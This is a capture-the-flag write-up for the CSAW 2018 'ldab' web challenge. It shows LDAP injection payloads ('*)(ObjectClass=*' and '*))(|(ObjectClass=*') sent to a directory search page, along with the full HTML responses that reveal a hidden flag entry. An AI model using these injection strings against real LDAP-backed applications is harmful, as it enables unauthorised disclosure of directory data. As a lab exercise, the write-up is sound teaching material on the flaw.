CTFtime.org

ldab

by kazkiti / PwnaSonic

Tags: ldap web 

Rating:

# ▼▼▼Ldab(Web:50、432/1448=29.8%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
dab

http://web.chal.csaw.io:8080
```

---

## 【Identify the vulnerability】

```
GET /index.php HTTP/1.1
Host: web.chal.csaw.io:8080
```

![](http://raw.githubusercontent.com/kazkiti/CTF-image/master/CSAW2018_top.png)

`OU CN SN GivenName UID`

As LDAP attributes are displayed, it seems to be using LDAP.

---

```
GET /index.php?search=*)(ObjectClass=* HTTP/1.1
Host: web.chal.csaw.io:8080
```

```
<html>
<head> <title>Any Comp. Directory </title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<style>
.input-mysize{
width:791px;
}
.table {
background-color:white;
border-style: solid;
border-width: 2px;
right-margin: 50px;
width:1000px;
}
</style>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="containter-fluid">
<div class="navbar-header">
Any Comp. Directory
</div>
</div>


</nav>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1 text-center">

Here is a list of all users and groups


</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-2">
<form role="search" action="index.php">
<div class="form-group" >
<input type="text" class="form-control input-mysize" placeholder="Search" name="search">
<button type="submit" class="btn btn-default"> Search</button>
</div>
</form>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

<tr>
<th> OU </th> <th> CN </th> <th> SN </th> <th> GivenName </th> <th> UID </th>
</tr>
<tr><td></td><td></td><td></td><td></td><td></td></tr><tr><td>Employees</td><td>pminksy</td><td>Minsky</td><td>Pete</td><td>pminsky</td></tr><tr><td>Employees</td><td>bharley</td><td>Harley</td><td>Bob</td><td>bharley</td></tr><tr><td>Employees</td><td>jross</td><td>Ross</td><td>Jake</td><td>jross</td></tr><tr><td>Employees</td><td>fdawson</td><td>Dawson</td><td>Fred</td><td>fdawson</td></tr><tr><td>Employees</td><td>rcave</td><td>Cave</td><td>Robert</td><td>rcave</td></tr><tr><td>Employees</td><td>XerxesHansen</td><td>Hansen</td><td>Xerxes</td><td>XerxesHansen</td></tr><tr><td>Employees</td><td>KirbyDaugherty</td><td>Daugherty</td><td>Kirby</td><td>KirbyDaugherty</td></tr><tr><td>Employees</td><td>DesiraeLowe</td><td>Lowe</td><td>Desirae</td><td>DesiraeLowe</td></tr><tr><td>Employees</td><td>BelleCarter</td><td>Carter</td><td>Belle</td><td>BelleCarter</td></tr><tr><td>Employees</td><td>FeliciaHines</td><td>Hines</td><td>Felicia</td><td>FeliciaHines</td></tr><tr><td>Employees</td><td>SopolineGilbert</td><td>Gilbert</td><td>Sopoline</td><td>SopolineGilbert</td></tr><tr><td>Employees</td><td>WesleyBranch</td><td>Branch</td><td>Wesley</td><td>WesleyBranch</td></tr><tr><td>Employees</td><td>IraMorton</td><td>Morton</td><td>Ira</td><td>IraMorton</td></tr><tr><td>Employees</td><td>HirokoBarber</td><td>Barber</td><td>Hiroko</td><td>HirokoBarber</td></tr><tr><td>Employees</td><td>BlairBeasley</td><td>Beasley</td><td>Blair</td><td>BlairBeasley</td></tr><tr><td>Employees</td><td>ThomasHernandez</td><td>Hernandez</td><td>Thomas</td><td>ThomasHernandez</td></tr><tr><td>Employees</td><td>StellaBurch</td><td>Burch</td><td>Stella</td><td>StellaBurch</td></tr><tr><td>Employees</td><td>StephenRowland</td><td>Rowland</td><td>Stephen</td><td>StephenRowland</td></tr><tr><td>Employees</td><td>DonovanShepherd</td><td>Shepherd</td><td>Donovan</td><td>DonovanShepherd</td></tr><tr><td>Employees</td><td>SilasWard</td><td>Ward</td><td>Silas</td><td>SilasWard</td></tr><tr><td>Employees</td><td>RandallPittman</td><td>Pittman</td><td>Randall</td><td>RandallPittman</td></tr><tr><td>Employees</td><td>MaxwellPaul</td><td>Paul</td><td>Maxwell</td><td>MaxwellPaul</td></tr><tr><td>Employees</td><td>BenedictCunningham</td><td>Cunningham</td><td>Benedict</td><td>BenedictCunningham</td></tr><tr><td>Employees</td><td>JessamineRobinson</td><td>Robinson</td><td>Jessamine</td><td>JessamineRobinson</td></tr><tr><td>Employees</td><td>GarrettMcintyre</td><td>Mcintyre</td><td>Garrett</td><td>GarrettMcintyre</td></tr><tr><td>Employees</td><td>TalonLevy</td><td>Levy</td><td>Talon</td><td>TalonLevy</td></tr><tr><td>Employees</td><td>UptonJohnson</td><td>Johnson</td><td>Upton</td><td>UptonJohnson</td></tr><tr><td>Employees</td><td>DeannaRoss</td><td>Ross</td><td>Deanna</td><td>DeannaRoss</td></tr><tr><td>Employees</td><td>XanthaHunter</td><td>Hunter</td><td>Xantha</td><td>XanthaHunter</td></tr><tr><td>Employees</td><td>GermaneKent</td><td>Kent</td><td>Germane</td><td>GermaneKent</td></tr><tr><td>Employees</td><td>PhoebeClements</td><td>Clements</td><td>Phoebe</td><td>PhoebeClements</td></tr><tr><td>Employees</td><td>MurphyBuck</td><td>Buck</td><td>Murphy</td><td>MurphyBuck</td></tr><tr><td>Employees</td><td>KeelyDowns</td><td>Downs</td><td>Keely</td><td>KeelyDowns</td></tr><tr><td>Employees</td><td>LeeCarlson</td><td>Carlson</td><td>Lee</td><td>LeeCarlson</td></tr><tr><td>Employees</td><td>BrentBarlow</td><td>Barlow</td><td>Brent</td><td>BrentBarlow</td></tr><tr><td>Employees</td><td>MaiaMcneil</td><td>Mcneil</td><td>Maia</td><td>MaiaMcneil</td></tr><tr><td>Employees</td><td>QuinnHaney</td><td>Haney</td><td>Quinn</td><td>QuinnHaney</td></tr><tr><td>Employees</td><td>JenettePacheco</td><td>Pacheco</td><td>Jenette</td><td>JenettePacheco</td></tr> </table>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

</table>
</div>
</div>
</div>
</body>
</html>
```

`LDAP injection` vulnerability exists because all data is displayed !!

---

## 【LDAP formula guess】

I guessed that the filter is being applied either before or after, and that flag is not displayed.

```
(&(GivenName=" + $_GET['search'] + ")(▲▲▲!=●●●))
```

or

```
(&(▲▲▲!=●●●)(GivenName=" + $_GET['search'] + "))
```

---

## 【exploit】

```
GET /index.php?search=*))(|(ObjectClass=* HTTP/1.1
Host: web.chal.csaw.io:8080
```

```
<html>
<head> <title>Any Comp. Directory </title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<style>
.input-mysize{
width:791px;
}
.table {
background-color:white;
border-style: solid;
border-width: 2px;
right-margin: 50px;
width:1000px;
}
</style>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="containter-fluid">
<div class="navbar-header">
Any Comp. Directory
</div>
</div>


</nav>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1 text-center">

Here is a list of all users and groups


</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-2">
<form role="search" action="index.php">
<div class="form-group" >
<input type="text" class="form-control input-mysize" placeholder="Search" name="search">
<button type="submit" class="btn btn-default"> Search</button>
</div>
</form>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

<tr>
<th> OU </th> <th> CN </th> <th> SN </th> <th> GivenName </th> <th> UID </th>
</tr>
<tr><td></td><td></td><td></td><td></td><td></td></tr><tr><td>Employees</td><td>pminksy</td><td>Minsky</td><td>Pete</td><td>pminsky</td></tr><tr><td>Employees</td><td>bharley</td><td>Harley</td><td>Bob</td><td>bharley</td></tr><tr><td>Employees</td><td>jross</td><td>Ross</td><td>Jake</td><td>jross</td></tr><tr><td>Employees</td><td>fdawson</td><td>Dawson</td><td>Fred</td><td>fdawson</td></tr><tr><td>Employees</td><td>rcave</td><td>Cave</td><td>Robert</td><td>rcave</td></tr><tr><td>Employees</td><td>XerxesHansen</td><td>Hansen</td><td>Xerxes</td><td>XerxesHansen</td></tr><tr><td>Employees</td><td>KirbyDaugherty</td><td>Daugherty</td><td>Kirby</td><td>KirbyDaugherty</td></tr><tr><td>Employees</td><td>DesiraeLowe</td><td>Lowe</td><td>Desirae</td><td>DesiraeLowe</td></tr><tr><td>Employees</td><td>BelleCarter</td><td>Carter</td><td>Belle</td><td>BelleCarter</td></tr><tr><td>Employees</td><td>FeliciaHines</td><td>Hines</td><td>Felicia</td><td>FeliciaHines</td></tr><tr><td>Employees</td><td>SopolineGilbert</td><td>Gilbert</td><td>Sopoline</td><td>SopolineGilbert</td></tr><tr><td>Employees</td><td>WesleyBranch</td><td>Branch</td><td>Wesley</td><td>WesleyBranch</td></tr><tr><td>Employees</td><td>IraMorton</td><td>Morton</td><td>Ira</td><td>IraMorton</td></tr><tr><td>Employees</td><td>HirokoBarber</td><td>Barber</td><td>Hiroko</td><td>HirokoBarber</td></tr><tr><td>Employees</td><td>BlairBeasley</td><td>Beasley</td><td>Blair</td><td>BlairBeasley</td></tr><tr><td>Employees</td><td>ThomasHernandez</td><td>Hernandez</td><td>Thomas</td><td>ThomasHernandez</td></tr><tr><td>Employees</td><td>StellaBurch</td><td>Burch</td><td>Stella</td><td>StellaBurch</td></tr><tr><td>Employees</td><td>StephenRowland</td><td>Rowland</td><td>Stephen</td><td>StephenRowland</td></tr><tr><td>Employees</td><td>DonovanShepherd</td><td>Shepherd</td><td>Donovan</td><td>DonovanShepherd</td></tr><tr><td>Employees</td><td>SilasWard</td><td>Ward</td><td>Silas</td><td>SilasWard</td></tr><tr><td>Employees</td><td>RandallPittman</td><td>Pittman</td><td>Randall</td><td>RandallPittman</td></tr><tr><td>Employees</td><td>MaxwellPaul</td><td>Paul</td><td>Maxwell</td><td>MaxwellPaul</td></tr><tr><td>Employees</td><td>BenedictCunningham</td><td>Cunningham</td><td>Benedict</td><td>BenedictCunningham</td></tr><tr><td>Employees</td><td>JessamineRobinson</td><td>Robinson</td><td>Jessamine</td><td>JessamineRobinson</td></tr><tr><td>Employees</td><td>GarrettMcintyre</td><td>Mcintyre</td><td>Garrett</td><td>GarrettMcintyre</td></tr><tr><td>Employees</td><td>TalonLevy</td><td>Levy</td><td>Talon</td><td>TalonLevy</td></tr><tr><td>Employees</td><td>UptonJohnson</td><td>Johnson</td><td>Upton</td><td>UptonJohnson</td></tr><tr><td>Employees</td><td>DeannaRoss</td><td>Ross</td><td>Deanna</td><td>DeannaRoss</td></tr><tr><td>Employees</td><td>XanthaHunter</td><td>Hunter</td><td>Xantha</td><td>XanthaHunter</td></tr><tr><td>Employees</td><td>GermaneKent</td><td>Kent</td><td>Germane</td><td>GermaneKent</td></tr><tr><td>Employees</td><td>PhoebeClements</td><td>Clements</td><td>Phoebe</td><td>PhoebeClements</td></tr><tr><td>Employees</td><td>MurphyBuck</td><td>Buck</td><td>Murphy</td><td>MurphyBuck</td></tr><tr><td>Employees</td><td>KeelyDowns</td><td>Downs</td><td>Keely</td><td>KeelyDowns</td></tr><tr><td>Employees</td><td>LeeCarlson</td><td>Carlson</td><td>Lee</td><td>LeeCarlson</td></tr><tr><td>Employees</td><td>BrentBarlow</td><td>Barlow</td><td>Brent</td><td>BrentBarlow</td></tr><tr><td>Employees</td><td>MaiaMcneil</td><td>Mcneil</td><td>Maia</td><td>MaiaMcneil</td></tr><tr><td>Employees</td><td>QuinnHaney</td><td>Haney</td><td>Quinn</td><td>QuinnHaney</td></tr><tr><td>Employees</td><td>JenettePacheco</td><td>Pacheco</td><td>Jenette</td><td>JenettePacheco</td></tr><tr><td>Employees</td><td>flag{ld4p_inj3ction_i5_a_th1ng}</td><td>Man</td><td>Flag</td><td>fman</td></tr> </table>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<table class="table">

</table>
</div>
</div>
</div>
</body>
</html>
```

`flag{ld4p_inj3ction_i5_a_th1ng}`

Comments